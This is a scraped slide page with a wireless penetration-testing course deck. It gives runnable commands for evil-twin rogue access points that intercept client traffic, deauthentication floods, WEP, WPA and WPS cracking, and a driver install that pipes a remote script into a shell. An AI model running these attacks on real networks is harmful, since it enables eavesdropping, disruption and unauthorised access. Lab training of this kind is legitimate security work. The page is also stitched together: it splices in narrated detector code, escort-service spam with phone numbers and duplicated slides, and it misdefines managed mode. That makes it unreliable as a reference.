Wireless Penetration Testing
Agenda
• Lab Setup
• Wi-Fi Network Fundamentals
• Wireless Packets
• Wi-Fi Network Interaction
• Wireless Reconnaissance
• Rogue Access points
• Cracking WEP
• Cracking WPA/WPA2
• WPS Attacks
• Security Best Practices
Lab Setup
Hardware requirements
• TP-Link WN722N
• Alfa AWUS036H
• Melon RTL8187L
• Alfa AWUS036NHA
• Panda PAU05
• Alfa AWUS036NEH
Hardware of my choice for this session:
TL-WN722N Wi-Fi Adaptor
System Architecture
• Minimum system configuration
• Windows 10 as the host machine
• Machine specification: 4 GB to 8 GB RAM, 100 GB HDD or SSD, 2 CPUs
• Virtualisation platform
• VirtualBox (https://www.virtualbox.org/)
(or)
• VMware (https://www.vmware.com/in/products/workstation-player/workstation-player-evaluation.html)
• Guest OS to be installed inside the VM
• Kali Linux (https://www.kali.org/get-kali/#kali-platforms)
Software Requirements
• Aircrack-ng
• Wifite
• Bettercap
• John the Ripper
• Hashcat
• coWPAtty
• Kismet
• Fluxion
• Wi-Fi Pumpkin 3
Wi-Fi Network Fundamentals
IEEE 802.11
• IEEE 802.11 is part of the IEEE 802 set of local area network (LAN)
technical standards, and specifies the set of media access control (MAC)
and physical layer (PHY) protocols for implementing wireless local area
network (WLAN) computer communication.
• The standard and amendments provide the basis for wireless network
products using the Wi-Fi brand and are the world's most widely used
wireless computer networking standards.
• IEEE 802.11 is used in most home and office networks to allow laptops,
printers, smartphones, and other devices to communicate with each other
and access the Internet without connecting wires. IEEE 802.11 is also a
basis for vehicle-based communication networks with IEEE 802.11p.
IEEE 802.11 (Contd.)
• The standards are created and maintained by the Institute of Electrical and
Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802).
• The base version of the standard was released in 1997 and has had subsequent
amendments. While each amendment is officially revoked when it is incorporated
in the latest version of the standard, the corporate world tends to market to the
revisions because they concisely denote the capabilities of their products.
• IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz,
5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications
list channels that might be used, the radio frequency spectrum availability
allowed varies significantly by regulatory domain.
• The protocols are typically used in conjunction with IEEE 802.2, and are designed
to interwork seamlessly with Ethernet, and are very often used to carry Internet
Protocol traffic.
Standards and Amendments
Standards and Amendments(Contd.)
In Process Standards
Wireless LAN: 802.11 Standards Comparison
Wi-Fi 7 is expected to launch in the second half of 2024; Wi-Fi 6 is the generation currently in use.
Basic Terminologies
Access Point (AP)
• AP is a networking hardware device that allows other Wi-Fi devices to
connect to a wired network.
• As a standalone device, the AP may have a wired connection to a router,
but, in a wireless router, it can also be an integral component of the router
itself.
Service Set Identifier (SSID)
• A service set identifier (SSID) is a sequence of characters that uniquely
names a wireless local area network (WLAN).
• An SSID is sometimes referred to as a "network name". This name allows
stations to connect to the desired network when multiple independent
networks operate in the same physical area.
Basic Terminologies (Contd.)
Basic Service Set Identifier (BSSID)
• It is the MAC (physical) address of the access point or wireless router that is
used to connect to the Wi-Fi network.
Extended Service Set Identifier (ESSID)
• It is a wireless network, created by multiple access points, which appears
to users as a single, seamless network, such as a network covering a home
or office that is too large for reliable coverage by a single access point.
Roaming
• Wi-Fi roaming occurs when a wireless client device moves outside the
usable range of one router or access point (AP) and connects to a
different one.
Basic Terminologies (Contd.)
Channel
• A Wi-Fi channel is the frequency at which your router sends information to
your device. Most routers and devices support several bands for the Wi-Fi
connection, the most common being 2.4 GHz and 5 GHz. Each of these ranges is
divided into smaller slots, the channels.
Data Rate
• Data rates vary with the modulation type and the number of spatial streams;
typical values are 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps and 867 Mbps.
Beacon
• Wi-Fi beacons are relatively short, regular transmissions from access
points (APs) whose purpose is to inform user devices (clients) about
available Wi-Fi services and nearby access points. Clients use beacons to
decide which AP to connect to.
Wireless Operating modes
• Managed - Managed mode allows you to configure your laptop or desktop
system as an AP for providing connectivity to other wireless stations.
• Ad-hoc - Ad-hoc mode refers to a wireless network structure where
devices can communicate directly with each other. This type of wireless
network is also called peer-to-peer mode.
• Master - When your wireless card is in master mode it acts as an access
point and actively transmits a signal.
• Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode,
allows a computer with a wireless network interface controller (WNIC) to
monitor all traffic received on a wireless channel.
• Auto - The easiest way to configure a wireless interface; it is enabled by
default.
TP-Link TL-WN722N Driver Software Installation:
• sudo apt update
• sudo apt upgrade
• sudo apt dist-upgrade
• sudo reboot
• sudo apt install bc
• sudo apt-get install build-essential
• sudo apt-get install libelf-dev
• sudo apt install linux-headers-amd64
• echo "blacklist r8188eu" | sudo tee /etc/modprobe.d/realtek.conf
• sudo reboot
• git clone https://github.com/aircrack-ng/rtl8188eus
• cd rtl8188eus
• sh -c "$(wget -O- https://gitlab.com/KanuX/rtl8188eus/-/raw/master/scripts/build.sh)"
Monitor Mode
• Start the Kali OS in VMware or Virtual box
• Plug-in USB Tplink Wireless Adapter (TL-WN722N)
• Run the following command
• iwconfig
Monitor Mode (Contd.)
• By default the interface is in Auto or Managed mode
• Run the following commands to switch to Monitor mode
• airmon-ng start wlan0
• airmon-ng check kill [if any interfering processes are running]
• iwconfig
• To disable monitor mode, run airmon-ng stop wlan0
• Restart NetworkManager: service network-manager start
Monitor Mode (Contd.)
Wireless Packets – IEEE 802.11 MAC Frame Structure
Wireless Packet Types
Analyzing Packets using Wireshark
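The three slides above cover the 802.11 MAC frame structure, the frame types and packet analysis in Wireshark, but the diagrams themselves did not survive extraction. The following Python decoder is an added example, not code from the deck or from any tool it names: it splits the Frame Control byte into type and subtype, reads the three address fields, and for beacons and probe responses walks the fixed fields and the tag/length/value information elements to recover the SSID, the channel (DS Parameter Set), the RSN AKM suites and the vendor WPS element, which is enough to label what security a beacon advertises (open, WEP, legacy WPA, WPA2-Personal, WPA2-Enterprise or WPA3-SAE). Deauthentication and disassociation frames yield their reason code. The two sample frames, the MAC addresses and the SSID "hello" are constructed for the example, and `parse_frame`, `Frame` and `security_label` are names chosen here.

```python
import struct
from dataclasses import dataclass, field
from typing import List, Optional

# Frame Control byte 0: protocol version (bits 0-1), type (bits 2-3), subtype (bits 4-7).
FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}
MGMT_SUBTYPES = {0: "association-request", 1: "association-response",
                 4: "probe-request", 5: "probe-response", 8: "beacon",
                 10: "disassociation", 11: "authentication", 12: "deauthentication"}
@dataclass
class Frame:
    ftype: str
    subtype: str
    addr1: str                            # receiver address
    addr2: Optional[str] = None           # transmitter address
    addr3: Optional[str] = None           # BSSID in a beacon
    ssid: Optional[str] = None            # remaining fields: beacon / probe response
    channel: Optional[int] = None
    privacy: bool = False                 # capability bit 4: encryption in use
    akms: List[int] = field(default_factory=list)  # RSN AKMs: 1=802.1X 2=PSK 8=SAE
    wpa1: bool = False                    # vendor IE 00:50:f2 type 1 (legacy WPA)
    wps: bool = False                     # vendor IE 00:50:f2 type 4 (WPS on)
    reason: Optional[int] = None          # deauthentication / disassociation

def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_frame(buf: bytes) -> Frame:
    """Decode the MAC header plus the management bodies a sensor cares about."""
    if len(buf) < 10:
        raise ValueError("shorter than the smallest 802.11 frame (ACK/CTS)")
    ftype, sub = (buf[0] >> 2) & 0x3, (buf[0] >> 4) & 0xF
    names = MGMT_SUBTYPES if ftype == 0 else {}
    fr = Frame(FRAME_TYPES[ftype], names.get(sub, f"subtype-{sub}"), mac(buf[4:10]))
    if len(buf) >= 16:                    # control frames may stop after addr2
        fr.addr2 = mac(buf[10:16])
    if len(buf) >= 24:                    # full three-address header + sequence control
        fr.addr3 = mac(buf[16:22])
    body = buf[24:]
    if ftype == 0 and sub in (5, 8) and len(body) >= 12:  # probe response / beacon
        cap = struct.unpack_from("<QHH", body, 0)[2]      # timestamp, interval, capability
        fr.privacy = bool(cap & 0x0010)
        _parse_ies(body[12:], fr)
    elif ftype == 0 and sub in (10, 12) and len(body) >= 2:
        fr.reason = struct.unpack_from("<H", body, 0)[0]
    return fr

def _parse_ies(data: bytes, fr: Frame) -> None:
    """Walk the tag/length/value information elements after the fixed fields."""
    i = 0
    while i + 2 <= len(data):
        tag, ln = data[i], data[i + 1]
        val = data[i + 2:i + 2 + ln]
        if len(val) < ln:                  # truncated element: stop, do not misparse
            break
        if tag == 0:
            fr.ssid = val.decode("utf-8", "replace")
        elif tag == 3 and ln == 1:         # DS Parameter Set: current channel
            fr.channel = val[0]
        elif tag == 48:                    # RSN element (WPA2/WPA3)
            fr.akms = _rsn_akms(val)
        elif tag == 221 and val[:3] == b"\x00\x50\xf2":   # Microsoft / WFA OUI
            fr.wpa1 |= val[3:4] == b"\x01"
            fr.wps |= val[3:4] == b"\x04"
        i += 2 + ln

def _rsn_akms(val: bytes) -> List[int]:
    """RSN body: version(2) group(4) n_pair(2) pair[4n] n_akm(2) akm[4n] ..."""
    off = 8 + 4 * struct.unpack_from("<H", val, 6)[0] if len(val) >= 8 else len(val)
    n_akm = struct.unpack_from("<H", val, off)[0] if len(val) >= off + 2 else 0
    off, akms = off + 2, []
    for _ in range(n_akm):
        if len(val) < off + 4:
            break
        if val[off:off + 3] == b"\x00\x0f\xac":           # IEEE 802.11 suite OUI
            akms.append(val[off + 3])
        off += 4
    return akms

def security_label(fr: Frame) -> str:
    """Name the protocol family a beacon advertises (open/WEP/WPA/WPA2/WPA3)."""
    for akm, name in ((8, "WPA3-SAE"), (2, "WPA2-Personal"), (1, "WPA2-Enterprise")):
        if akm in fr.akms:
            return name
    if fr.wpa1:
        return "WPA (legacy)"
    return "WEP" if fr.privacy else "open"

# Constructed sample frames (not captures): WPA2-PSK beacon "hello", channel 6, WPS on; deauth from that BSSID.
BEACON = (b"\x80\x00\x00\x00" + b"\xff" * 6 + b"\x02\x11\x22\x33\x44\x55" * 2
          + b"\x10\x00" + b"\x00" * 8 + b"\x64\x00" + b"\x11\x00"
          + b"\x00\x05hello" + b"\x03\x01\x06"
          + b"\x30\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04"
          + b"\x01\x00\x00\x0f\xac\x02\x00\x00"
          + b"\xdd\x09\x00\x50\xf2\x04\x10\x4a\x00\x01\x10")
DEAUTH = (b"\xc0\x00\x3a\x01" + b"\x02\xaa\xbb\xcc\xdd\xee"
          + b"\x02\x11\x22\x33\x44\x55" * 2 + b"\x20\x00" + b"\x07\x00")
```

Feeding `parse_frame` the raw 802.11 payload of each packet in a monitor-mode capture (after stripping the radiotap header) gives the same type/subtype, BSSID and SSID columns Wireshark shows, and `security_label` reproduces the WEP/WPA/WPA2 column of airodump-ng from the beacon alone. The length checks matter: control frames such as ACK are only 10 bytes, and a truncated information element must stop the walk rather than be read past the end of the buffer.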
Wi-Fi Network Interaction
Wi-Fi Authentication Methods
Wireless Encryption Protocols (WEP/WPA/WPA2)
WPA2 Authentication & Keys
WPA2 Personal and Enterprise
WPS (Wi-Fi Protected Setup) Authentication
Wireless Reconnaissance
• Tools required: Bettercap, airodump-ng and Kismet
• In Bettercap, run the following commands
• Select the interface when starting: bettercap --iface wlan0
• help wifi
• wifi.recon on
• wifi.show
• wifi.recon off
Wireless Reconnaissance with Bettercap
Wardriving with Kismet (Just for reference)
• This is only possible while moving (driving or roaming) through multiple
locations in a vehicle, capturing Wi-Fi hotspots together with GPS
information.
• Hardware required - Car, laptop, Android phone, Wi-Fi adapter
• Software required - Kismet, GPSD, ADB, Share GPS (Android app),
Google Earth
• Reference blog link - https://veteransec.org/wifi-hacking-wardriving-with-an-android-phone-and-raspberry-pi-3/
Wardriving with WiGLE
Wireless Reconnaissance with Airodump-ng
Rogue Access points requirements
• Tools required: airodump-ng, airbase-ng, airmon-ng and Wi-Fi Pumpkin 3
• Wi-Fi Pumpkin 3 installation
• git clone https://github.com/P0cL4bs/wifipumpkin3
• https://wifipumpkin3.github.io/docs/getting-started#installation
• dnsmasq
• apt-get install dnsmasq -y
Creation of Rogue AP using Wi-Fi Pumpkin 3
• Plug in the wireless adapter; monitor mode does not need to be enabled.
Run the following commands
• wifipumpkin3
• set interface wlan0
• set ssid hello
• set proxy noproxy
• start
• This creates a rogue AP with the name “Hello”
Creation of Rogue AP using Wi-Fi Pumpkin 3 (Contd.)
• Once any device connects to the rogue AP “Hello”, the traffic of the
connected clients can easily be intercepted (evil twin attack).
Creation of Rogue AP using Air-ng tools
• airodump-ng wlan0
• airbase-ng -c 11 -e tplink -s -W 1 wlan0
• airodump-ng -c 11 --bssid <BSSID of the newly created tplink AP> -w 1 wlan0
• For the evil twin/MITM attack we need dnsmasq
• airbase-ng -e TP-Link -c 8 wlan0 [create the fake AP for the evil twin attack]
• The at0 interface is created
geany /etc/dnsmasq.conf
interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Creation of Rogue AP using Air-ng tools (Contd.)
Run the commands below in a separate terminal
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect any device now and its traffic is visible
Sniffing with Dnsmasq
Cracking WEP
Create a rogue access point with the WEP cipher
• airbase-ng -c 11 -e hello -w 31:32:33:34:35 wlan0
Use the same dnsmasq config here
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect a client device to the WEP fake AP
• airodump-ng wlan0 [to check whether the fake AP is up]
Cracking WEP(Contd.)
• Deauthentication attack with aireplay-ng
• aireplay-ng --deauth 0 -a <MAC address of the fake AP> -c <MAC address of the connected client>
wlan0
• Deauthentication attack with bettercap
• bettercap --iface wlan0
• wifi.recon on and wifi.show
• wifi.deauth <MAC address of the fake AP>
• Macchanger
• ifconfig wlan0 down
• macchanger -r wlan0
• ifconfig wlan0 up
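The rogue AP / evil twin slides and the deauthentication steps above are exactly the two behaviours a defender's wireless sensor should notice. The monitor below is an added example, not code from the deck or from any tool named in it: it consumes already-decoded beacon and deauthentication events, compares every beacon against a trusted inventory of the site's own BSSIDs (flagging an unknown BSSID that announces a trusted SSID, or one that offers that SSID with weaker security than the real network), flags open and WEP networks seen nearby, and raises one alert per burst when the deauthentication frames attributed to a BSSID exceed a threshold inside a sliding time window. `WlanMonitor`, `Event`, the inventory `TRUSTED` and the event stream are all constructed for the example; the security labels follow the WEP/WPA/WPA2/WPA3 families listed in the deck.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Ranking used to spot a twin of a trusted SSID that offers weaker security.
SECURITY_RANK = {"open": 0, "WEP": 1, "WPA (legacy)": 2, "WPA2-Personal": 3,
                 "WPA2-Enterprise": 4, "WPA3-SAE": 5}

@dataclass(frozen=True)
class Event:
    """One decoded frame as a passive monitor-mode sensor would report it."""
    t: float             # capture time in seconds
    kind: str            # "beacon" or "deauth"
    bssid: str           # transmitter address (spoofable, hence the rate check)
    ssid: str = ""       # beacons only
    security: str = ""   # beacons only: label as advertised in the beacon
    channel: int = 0

class WlanMonitor:
    def __init__(self, trusted: Dict[str, dict], window: float = 10.0,
                 deauth_threshold: int = 20):
        # trusted: {ssid: {"bssids": {...}, "security": "WPA2-Enterprise"}} is the
        # site's own AP inventory; any other BSSID announcing that SSID is suspect.
        self.trusted, self.window, self.threshold = trusted, window, deauth_threshold
        self._deauth = defaultdict(deque)   # bssid -> deauth timestamps inside window
        self._flooding = set()              # bssids whose current burst was reported
        self._seen = set()                  # (kind, bssid) beacon findings already raised
        self.alerts: List[Tuple[str, str]] = []

    def feed(self, ev: Event) -> List[Tuple[str, str]]:
        """Process one event; return the alerts it newly triggered."""
        if ev.kind == "beacon":
            return self._check_beacon(ev)
        if ev.kind == "deauth":
            return self._check_deauth(ev)
        return []

    def _report(self, kind: str, ev: Event, msg: str) -> List[Tuple[str, str]]:
        if (kind, ev.bssid) in self._seen:  # each beacon finding once per BSSID
            return []
        self._seen.add((kind, ev.bssid))
        self.alerts.append((kind, msg))
        return [(kind, msg)]

    def _check_beacon(self, ev: Event) -> List[Tuple[str, str]]:
        out, ref = [], self.trusted.get(ev.ssid)
        if ref is None:                     # not ours: only flag open/WEP networks nearby
            if SECURITY_RANK.get(ev.security, 0) <= 1:
                out += self._report("weak-network", ev,
                                    f"{ev.ssid!r} ({ev.bssid}) is {ev.security}")
            return out
        if ev.bssid not in ref["bssids"]:   # evil twin / rogue AP reusing our SSID
            out += self._report("rogue-ap", ev, f"unknown BSSID {ev.bssid} announces "
                                f"trusted SSID {ev.ssid!r} on channel {ev.channel}")
        if SECURITY_RANK.get(ev.security, 0) < SECURITY_RANK[ref["security"]]:
            out += self._report("security-downgrade", ev, f"{ev.bssid} offers "
                                f"{ev.ssid!r} as {ev.security}, expected {ref['security']}")
        return out

    def _check_deauth(self, ev: Event) -> List[Tuple[str, str]]:
        q = self._deauth[ev.bssid]
        q.append(ev.t)
        while ev.t - q[0] > self.window:    # slide the window (timestamps ascend)
            q.popleft()
        if len(q) <= self.threshold:
            self._flooding.discard(ev.bssid)  # burst over: a later one alerts again
            return []
        if ev.bssid in self._flooding:      # already reported this burst
            return []
        self._flooding.add(ev.bssid)
        alert = ("deauth-flood", f"{len(q)} deauthentication frames from "
                 f"{ev.bssid} within {self.window:g} s")
        self.alerts.append(alert)
        return [alert]

# Constructed inventory and event stream (not real captures).
TRUSTED = {"corp-wifi": {"bssids": {"02:11:22:33:44:55", "02:11:22:33:44:56"},
                         "security": "WPA2-Enterprise"}}

def sample_events() -> List[Event]:
    ev = [Event(0.0, "beacon", "02:11:22:33:44:55", "corp-wifi", "WPA2-Enterprise", 6),
          Event(0.1, "beacon", "02:11:22:33:44:56", "corp-wifi", "WPA2-Enterprise", 36),
          Event(0.2, "beacon", "02:de:ad:be:ef:01", "guest-printer", "WEP", 11),
          Event(1.0, "beacon", "02:ba:dd:ba:dd:01", "corp-wifi", "open", 6)]
    # 25 deauthentication frames within 1.2 s carrying one of our own BSSIDs
    ev += [Event(100.0 + i * 0.05, "deauth", "02:11:22:33:44:55") for i in range(25)]
    return ev

def run(events: List[Event], trusted=TRUSTED) -> List[Tuple[str, str]]:
    mon = WlanMonitor(trusted)
    for ev in events:
        mon.feed(ev)
    return mon.alerts

if __name__ == "__main__":
    for kind, msg in run(sample_events()):
        print(f"[{kind}] {msg}")
```

The source address of a deauthentication frame is what the sender chose to put there, so the flood check keys on the claimed BSSID and rate rather than trusting the address; a real AP disconnects clients only occasionally, while the `--deauth 0` loop in the slides produces a continuous stream. Beacon findings are reported once per BSSID to keep the alert list readable, whereas a deauthentication burst is reported again if it stops and restarts.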
Cracking WEP(Contd.)
• Use airodump-ng to write the WEP capture file
• airodump-ng -c 11 --bssid <MAC address of the fake AP> -w wepcrack wlan0
• Fake authentication
• aireplay-ng --fakeauth 60 -e hello -a <MAC address of the fake AP> -h <MAC address of wlan0> wlan0
• ARP request replay attack
• aireplay-ng --arpreplay -e hello -a <MAC address of the fake AP> -h <MAC address of wlan0> wlan0
• Perform the deauth attack again
• aireplay-ng --deauth 0 -a <MAC address of the fake AP> -c <MAC address of the connected client> wlan0
• Stop the deauth
• Crack the captured WEP file using aircrack-ng
• aircrack-ng wepcrack-01.cap [it will crack the WEP key]
Cracking WEP(Contd.)
Cracking the WEP dump file using Aircrack-ng
Cracking WEP using Wifite
Cracking WPA/WPA2
Password Wordlists (Seclists)
Password Wordlists (Weakpass.com)
Password Wordlists (wiki.skullsecurity.org)
Capture the WPA/WPA2 Handshake file
• Run the following commands:
• airmon-ng start wlan0 [put the wireless adapter in monitor mode]
• airodump-ng wlan0 [list all the APs that are alive]
• airodump-ng -c 6 --bssid <MAC address of the WPA AP> -w wpacracking wlan0 [capture the
handshake into the wpacracking capture file with airodump-ng]
• Perform the deauthentication step manually by disconnecting and reconnecting your
mobile device to that AP
• aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt
[pass the wordlist together with the handshake file]
Capture the WPA/WPA2 Handshake file (Contd.)
Cracking WPA/WPA2 using John the Ripper
• john --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout
| aircrack-ng -e tplink -w - wpacracking-01.cap
Cracking WPA/WPA2 using Wifite
• wifite --wpa
• Before starting the attack, connect a client device
Cracking WPS
Cracking WPS (PIN attacks)
• wifite --wps [using Wifite]
• reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 -K [using Reaver]
Next-Gen Wireless Assessment tools
Wi-Fi Pineapple
Security Best Practices
• Change default passwords
• Restrict access to authorized users
• Encrypt the data on your network
• Protect your Service Set Identifier (SSID)
• Install a firewall
• Maintain antivirus software
• Use file sharing with caution
• Keep your access point software patched and up to date
• Check your internet provider’s or router manufacturer’s wireless security options
• Connect using a Virtual Private Network (VPN)
Reference blog link - https://www.cisa.gov/uscert/ncas/tips/ST05-003
THANK YOU!

FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 

Recently uploaded (20)

Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 

Wireless Penetration Testing

8. IEEE 802.11 (Contd.)
• The standards are created and maintained by the Institute of Electrical and Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802).
• The base version of the standard was released in 1997 and has had subsequent amendments. While each amendment is officially revoked when it is incorporated in the latest version of the standard, the corporate world tends to market to the revisions because they concisely denote the capabilities of their products.
• IEEE 802.11 uses various frequencies including, but not limited to, the 2.4 GHz, 5 GHz, 6 GHz and 60 GHz bands. Although the IEEE 802.11 specifications list channels that might be used, the radio frequency spectrum actually available varies significantly by regulatory domain.
• The protocols are typically used in conjunction with IEEE 802.2, are designed to interwork seamlessly with Ethernet, and are very often used to carry Internet Protocol traffic.
12. Wireless LAN: 802.11 Standards Comparison
(comparison table shown as an image in the deck)
• Wi-Fi 7 is expected to launch in the second half of 2024; at the time of this deck Wi-Fi 6 is the generation in common use.
14. Basic Terminologies (Contd.)
Access Point (AP)
• An AP is a networking hardware device that allows other Wi-Fi devices to connect to a wired network.
• As a standalone device, the AP may have a wired connection to a router; in a wireless router it is an integral component of the router itself.
Service Set Identifier (SSID)
• An SSID is a sequence of up to 32 bytes that names a wireless local area network (WLAN).
• An SSID is sometimes referred to as the "network name". This name lets stations pick the desired network when multiple independent networks operate in the same physical area. The SSID is not unique or authenticated: anyone can advertise the same name, which is what the rogue AP slides later rely on.
15. Basic Terminologies (Contd.)
Basic Service Set Identifier (BSSID)
• The MAC address of the access point or wireless router radio that clients connect to. It identifies one basic service set, whereas the SSID is only a name.
Extended Service Set Identifier (ESSID)
• The name of an extended service set: a wireless network built from multiple access points that share one SSID and appear to users as a single, seamless network, for example a home or office too large for reliable coverage by a single access point.
Roaming
• Wi-Fi roaming occurs when a wireless client device moves outside the usable range of one router or access point (AP) and connects to a different one, normally another AP of the same ESS.
16. Basic Terminologies (Contd.)
Channel
• A Wi-Fi channel is the frequency slot on which a router transmits to your device. Most routers and devices support several bands, the most common being 2.4 GHz and 5 GHz; each band is divided into smaller slots, the channels.
Data Rate
• Data rates depend on the modulation type and the number of spatial streams; examples are 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps and 867 Mbps.
Beacon
• Wi-Fi beacons are relatively short, regular transmissions from access points (APs) that inform user devices (clients) about available Wi-Fi services and nearby access points. Clients use beacons to decide which AP to connect to. Beacons are unauthenticated, so everything in them (SSID, BSSID, channel, security capabilities) can be forged by a rogue AP.
18. Wireless Operating modes (Contd.)
